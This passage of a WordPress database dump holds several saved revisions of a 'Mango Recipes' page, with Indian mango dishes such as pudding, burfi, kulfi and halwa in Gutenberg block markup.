color)</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INSTRUCTIONS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Soak kesar or saffron in 2 tablespoon hot water. This is optional.</li><li>Wash and peel mango. Chop them to cubes and add to a blender jar.</li><li>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.</li><li>Blend on a medium speed until smooth.</li><li>Add chopped pistas. Give a good stir.</li><li>Pour the mixture to the kulfi moulds and refrigerate until set.</li><li>Rub the moulds in between your palm or dip them in a bowl of water.</li><li>Gently loosen and remove mango kulfi.</li><li>Garnish with crushed pista. Serve with love.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-halwa-recipe\"><strong>MANGO HALWA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time :15 Mins</li><li>Cook Time           :45 Mints</li><li>Makes                  :4-5 Perfect Squares &amp; Some Small Pieces</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INGREDIENTS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>2 and 3/4 cups Mango Pulp</li><li>1 tablespoon Ghee</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INSTRUCTIONS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.</li><li>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.</li><li>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.</li><li>Left the plate undisturbed for one more hour and then cut it into pieces.</li><li>Garnish it with nuts of your choice.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:group -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-07 16:56:43','2022-02-07 11:26:43','',745,'https://mangomitra.in/?p=808',0,'revision','',0),(810,1,'2022-02-07 16:58:29','2022-02-07 11:28:29','<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading -->\n<h2 id=\"mango-pudding-recipe\"><strong>MANGO PUDDING RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time  : 4 hours</li><li>Cook Time            :15 minutes</li><li>Total Time             : 4 hours 15 minutes</li><li>Servings                : 3 Servings</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>1 tsp agar-agar / gelatin / china grass</li><li>2 tbsp hot water</li><li>2 cups mango puree</li><li>for cream layer:</li><li>1 cup milk full cream</li><li>1 tsp agar-agar / gelatin</li><li>½ cup sugar powdered</li><li>1 cup cream</li><li>1 tsp vanilla extract / vanilla essence</li><li>pinch of salt</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water. Mix well and dissolve agar-agar completely.</li><li>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.</li><li>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.</li><li>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.</li><li>Now prepare cream layer by heating up milk.</li><li>Add in 1 tablespoon agar-agar / gelatin and whisk well.</li><li>Cook the milk on medium-low heat till it steams (do not boil).</li><li>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.</li><li>Let the milk cool for 10 minutes before pouring to the glass.</li><li>Pour the milk into glass.</li><li>Refrigerate it for 2 hours or overnight, till it sets completely.</li><li>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:heading -->\n<h2 id=\"mavinakayi-chitranna-recipe\"><strong>MAVINAKAYI CHITRANNA RECIPE </strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\">Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe. </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\">While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-rasayana\"><strong>MANGO RASAYANA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Cut the mangoes into small cubes and keep them in a mixing bowl.</li><li>Squeeze and extract the remaining mango juice from the mangoes.</li><li>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.</li><li>Serve chilled with dosa, poori, or chapati.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-seekarna\"><strong>MANGO SEEKARNA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Variations<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-burfi-recipe\"><strong>MANGO BURFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time           : 15 minutes<br>Total Time            : 20 minutes<br>Servings               : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>INGREDIENTS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 cup mango cubes</li><li>½ cup milk</li><li>1 cup sugar</li><li>3 cup coconut grated</li><li>¼ tablespoon cardamom powder</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INSTRUCTONS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a blender take 1 cup mango and ½ cup milk.</li><li>Blend to smooth puree adding more milk if required.</li><li>Transfer the mango puree to large kadai.</li><li>Also add 1 cup sugar and mix until sugar dissolves completley.</li><li>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.</li><li>Now add ¼ tablespoon cardamom powder and mix well.</li><li>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.</li><li>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-kulfi-recipe\"><strong>MANGO KULFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>INGREDIENTS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)</li><li>½ tin sweetened  condensed milk(milkmaid)</li><li>200 ml  whipping cream or 250 ml cream(chilled)</li><li>1/4 tablespoon elaichi (cardamom powder)</li><li>1 pinch kesar (saffron) (optional for color)</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INSTRUCTIONS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Soak kesar or saffron in 2 tablespoon hot water. This is optional.</li><li>Wash and peel mango. Chop them to cubes and add to a blender jar.</li><li>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.</li><li>Blend on a medium speed until smooth.</li><li>Add chopped pistas. Give a good stir.</li><li>Pour the mixture to the kulfi moulds and refrigerate until set.</li><li>Rub the moulds in between your palm or dip them in a bowl of water.</li><li>Gently loosen and remove mango kulfi.</li><li>Garnish with crushed pista. Serve with love.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-halwa-recipe\"><strong>MANGO HALWA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time :15 Mins</li><li>Cook Time           :45 Mints</li><li>Makes                  :4-5 Perfect Squares &amp; Some Small Pieces</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INGREDIENTS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>2 and 3/4 cups Mango Pulp</li><li>1 tablespoon Ghee</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INSTRUCTIONS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.</li><li>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.</li><li>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.</li><li>Left the plate undisturbed for one more hour and then cut it into pieces.</li><li>Garnish it with nuts of your choice.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:group -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-07 16:58:29','2022-02-07 11:28:29','',745,'https://mangomitra.in/?p=810',0,'revision','',0),(811,1,'2022-02-07 16:59:14','2022-02-07 11:29:14','<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading -->\n<h2 id=\"mango-pudding-recipe\"><strong>MANGO PUDDING RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time  : 4 hours</li><li>Cook Time            :15 minutes</li><li>Total Time             : 4 hours 15 minutes</li><li>Servings                : 3 Servings</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>1 tsp agar-agar / gelatin / china grass</li><li>2 tbsp hot water</li><li>2 cups mango puree</li><li>for cream layer:</li><li>1 cup milk full cream</li><li>1 tsp agar-agar / gelatin</li><li>½ cup sugar powdered</li><li>1 cup cream</li><li>1 tsp vanilla extract / vanilla essence</li><li>pinch of salt</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water. Mix well and dissolve agar-agar completely.</li><li>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.</li><li>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.</li><li>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.</li><li>Now prepare cream layer by heating up milk.</li><li>Add in 1 tablespoon agar-agar / gelatin and whisk well.</li><li>Cook the milk on medium-low heat till it steams (do not boil).</li><li>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.</li><li>Let the milk cool for 10 minutes before pouring to the glass.</li><li>Pour the milk into glass.</li><li>Refrigerate it for 2 hours or overnight, till it sets completely.</li><li>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:heading -->\n<h2 id=\"mavinakayi-chitranna-recipe\"><strong>MAVINAKAYI CHITRANNA RECIPE </strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\">Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe. While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-rasayana\"><strong>MANGO RASAYANA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Cut the mangoes into small cubes and keep them in a mixing bowl.</li><li>Squeeze and extract the remaining mango juice from the mangoes.</li><li>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.</li><li>Serve chilled with dosa, poori, or chapati.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-seekarna\"><strong>MANGO SEEKARNA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Variations<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-burfi-recipe\"><strong>MANGO BURFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time           : 15 minutes<br>Total Time            : 20 minutes<br>Servings               : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>INGREDIENTS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 cup mango cubes</li><li>½ cup milk</li><li>1 cup sugar</li><li>3 cup coconut grated</li><li>¼ tablespoon cardamom powder</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INSTRUCTONS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a blender take 1 cup mango and ½ cup milk.</li><li>Blend to smooth puree adding more milk if required.</li><li>Transfer the mango puree to large kadai.</li><li>Also add 1 cup sugar and mix until sugar dissolves completley.</li><li>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.</li><li>Now add ¼ tablespoon cardamom powder and mix well.</li><li>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.</li><li>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-kulfi-recipe\"><strong>MANGO KULFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>INGREDIENTS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)</li><li>½ tin sweetened  condensed milk(milkmaid)</li><li>200 ml  whipping cream or 250 ml cream(chilled)</li><li>1/4 tablespoon elaichi (cardamom powder)</li><li>1 pinch kesar (saffron) (optional for color)</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INSTRUCTIONS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>Soak kesar or saffron in 2 tablespoon hot water. This is optional.</li><li>Wash and peel mango. Chop them to cubes and add to a blender jar.</li><li>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.</li><li>Blend on a medium speed until smooth.</li><li>Add chopped pistas. Give a good stir.</li><li>Pour the mixture to the kulfi moulds and refrigerate until set.</li><li>Rub the moulds in between your palm or dip them in a bowl of water.</li><li>Gently loosen and remove mango kulfi.</li><li>Garnish with crushed pista. Serve with love.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-halwa-recipe\"><strong>MANGO HALWA RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time :15 Mins</li><li>Cook Time           :45 Mints</li><li>Makes                  :4-5 Perfect Squares &amp; Some Small Pieces</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INGREDIENTS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>2 and 3/4 cups Mango Pulp</li><li>1 tablespoon Ghee</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:paragraph -->\n<p><strong>INSTRUCTIONS</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:list -->\n<ul><li>In a heavy bottom vessel add the ghee and when it is hot add the mango pulp.</li><li>Keep stirring the mixture every 10-15 minutes so that it does not stick to the vessel.</li><li>The mixture will reduce in quantity, there will be a change in color and after 45 minutes transfer this mixture to a greased (with very little ghee) plate. I used 2 and 3/4 cups of pulp and it cooked down to 3/4ths of a cup approximately. So a very small plate is enough.</li><li>Left the plate undisturbed for one more hour and then cut it into pieces.</li><li>Garnish it with nuts of your choice.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:group -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:separator -->\n<hr class=\"wp-block-separator\"/>\n<!-- /wp:separator -->','Mango Recipes','','inherit','closed','closed','','745-revision-v1','','','2022-02-07 16:59:14','2022-02-07 11:29:14','',745,'https://mangomitra.in/?p=811',0,'revision','',0),(813,1,'2022-02-07 17:05:18','2022-02-07 11:35:18','<!-- wp:group -->\n<div class=\"wp-block-group\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:heading -->\n<h2 id=\"mango-pudding-recipe\"><strong>MANGO PUDDING RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Preparation Time  : 4 hours</li><li>Cook Time            :15 minutes</li><li>Total Time             : 4 hours 15 minutes</li><li>Servings                : 3 Servings</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>1 tsp agar-agar / gelatin / china grass</li><li>2 tbsp hot water</li><li>2 cups mango puree</li><li>for cream layer:</li><li>1 cup milk full cream</li><li>1 tsp agar-agar / gelatin</li><li>½ cup sugar powdered</li><li>1 cup cream</li><li>1 tsp vanilla extract / vanilla essence</li><li>pinch of salt</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a large mixing bowl take 1 tablespoon of agar-agar / gelatin and add 2 tablespoon hot water. Mix well and dissolve agar-agar completely.</li><li>Further add 2 cups of mango puree. Mix well making sure the pulp gets mixed up with agar-agar uniformly.</li><li>Furthermore, place the serving glass in a bowl so that it gets tilted slightly. Pour in prepared mango mixture till it reaches the rim.</li><li>Now refrigerate it for 2 hours or overnight, till it sets completely. After 2 hours, make sure to check the mango has set completely.</li><li>Now prepare cream layer by heating up milk.</li><li>Add in 1 tablespoon agar-agar / gelatin and whisk well.</li><li>Cook the milk on medium-low heat till it steams (do not boil).</li><li>Further add 1 cup cream and whisk well. Additionally add ½ cup powdered sugar, 1 tablespoon vanilla extract and pinch of salt. Whisk and dissolve the sugar completely.</li><li>Let the milk cool for 10 minutes before pouring to the glass.</li><li>Pour the milk into glass.</li><li>Refrigerate it for 2 hours or overnight, till it sets completely.</li><li>Finally, garnish with few chopped mangoes and enjoy mango panna cotta or mango pudding.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column {\"width\":\"100%\"} -->\n<div class=\"wp-block-column\" style=\"flex-basis:100%\"><!-- wp:heading -->\n<h2 id=\"mavinakayi-chitranna-recipe\"><strong>MAVINAKAYI CHITRANNA RECIPE </strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph {\"align\":\"left\"} -->\n<p class=\"has-text-align-left\">Mavinakayi Chitranna Recipe is a delicious preparation of rice from the raw green mangoes that you get in the summers. The tartness of the mangoes along with the green chillies and the seasonings, brings out the flavors of this classic South Indian Rice recipe. While you’re probably enjoying the beautifully luscious ripe mangoes of the season, don’t forget to enjoy your share of the raw mangoes too by trying this Mavinakayi Chitranna Recipe. Summer feels incomplete without getting enough of the tangy hit of raw mangoes, balanced by hot spices,salt, lime and the right tempering, raw mangoes are delicious in a range of preparations.Serve the Mavinakayi Chitranna along with a Tomato Onion Cucumber Raita or High-Protein Peanut Chutney and a roasted papad for lunch or even for dinner. The Mavinakayi Chitranna makes a great picnic lunch too.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-rasayana\"><strong>MANGO RASAYANA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Cut the mangoes into small cubes and keep them in a mixing bowl.</li><li>Squeeze and extract the remaining mango juice from the mangoes.</li><li>Next add coconut milk, jaggery, and cardamom powder. Mix well. Adjust the consistency of rasayana.</li><li>Serve chilled with dosa, poori, or chapati.</li></ul>\n<!-- /wp:list --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-seekarna\"><strong>MANGO SEEKARNA</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Seekarane with Holige, Poori, Dosa, chapati, or also can be eaten as it is.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Variations<br>Any variety of mangoes can be used, but try to choose sweet, juicy, and pulpy mangoes.<br>You can use white or brown sugar instead of jaggery. Adjust the jaggery based on the sweetness of the mango. I have made coconut milk at home using freshly shredded coconut but you can also use store brought coconut milk. You can also replace coconut milk with dairy milk or almond milk.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-burfi-recipe\"><strong>MANGO BURFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Preparation Time : 5 minutes<br>Cook Time           : 15 minutes<br>Total Time            : 20 minutes<br>Servings               : 24 pieces</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-1\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>1 cup mango cubes</li><li>½ cup milk</li><li>1 cup sugar</li><li>3 cup coconut grated</li><li>¼ tablespoon cardamom powder</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructons\"><strong>INSTRUCTONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Firstly, in a blender take 1 cup mango and ½ cup milk.</li><li>Blend to smooth puree adding more milk if required.</li><li>Transfer the mango puree to large kadai.</li><li>Also add 1 cup sugar and mix until sugar dissolves completley.</li><li>Further add 3 cup coconut keep stirring till the mixture starts to thicken continue to cook on medium flame stirring continuously and after 15 minutes, coconut mixture will start to separate from pan.</li><li>Now add ¼ tablespoon cardamom powder and mix well.</li><li>Transfer the prepared mixture into a greased plate lined with baking paper set well forming a block and cut into pieces.</li><li>Finally, serve mango burfi / mango coconut barfi or store in airtight container for a week in the refrigerator.</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading -->\n<h2 id=\"mango-kulfi-recipe\"><strong>MANGO KULFI RECIPE</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>Indian mango kulfi is a instant dessert that is made with condensed milk, mango pulp and cream.<br>For best results follow my detailed step-by-step photo instructions and tips.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"ingredients-2\"><strong>INGREDIENTS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>1 ½ cup mango pieces, cubed (use sweet mango)(1 medium)</li><li>½ tin sweetened  condensed milk(milkmaid)</li><li>200 ml  whipping cream or 250 ml cream(chilled)</li><li>1/4 tablespoon elaichi (cardamom powder)</li><li>1 pinch kesar (saffron) (optional for color)</li></ul>\n<!-- /wp:list -->\n\n<!-- wp:heading {\"level\":5} -->\n<h5 id=\"instructions-1\"><strong>INSTRUCTIONS</strong></h5>\n<!-- /wp:heading -->\n\n<!-- wp:list -->\n<ul><li>Soak kesar or saffron in 2 tablespoon hot water. This is optional.</li><li>Wash and peel mango. Chop them to cubes and add to a blender jar.</li><li>Add chilled cream, saffron, condensed milk and cardamom powder to the jar.</li><li>Blend on a medium speed until smooth.</li><li>Add chopped pistas. Give a good stir.</li><li>Pour the mixture to the kulfi moulds and refrigerate until set.</li><li>Rub the moulds in between your palm or dip them in a bowl of water.</li><li>Gently loosen and 